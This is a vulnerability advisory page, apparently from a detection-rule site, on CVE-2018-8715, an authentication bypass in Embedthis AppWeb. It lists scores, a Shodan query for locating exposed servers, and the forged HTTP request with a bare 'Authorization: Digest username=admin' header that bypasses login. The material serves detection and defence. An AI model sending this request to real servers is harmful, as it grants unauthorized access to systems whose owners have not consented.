🔙 목록으로 돌아가기

CVE-2018-8715: AppWeb - Authentication Bypass

TitleAppWeb - Authentication Bypass
Authormilo2012
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the application.
RemediationApply the necessary patches or updates provided by the vendor to fix the authentication bypass vulnerability in AppWeb.
CVSS Score8.1
EPSS Score0.92326
CVE IDCVE-2018-8715
CWE IDCWE-287
Shodan Querycpe:"cpe:2.3:a:embedthis:appweb"
Tags cve cve2018 appweb auth-bypass embedthis vuln

🔍 Vulnerability Description

The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types.

🌐 HTTP Request

GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Connection: close
Authorization: Digest username=admin
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-8715.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-8715.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A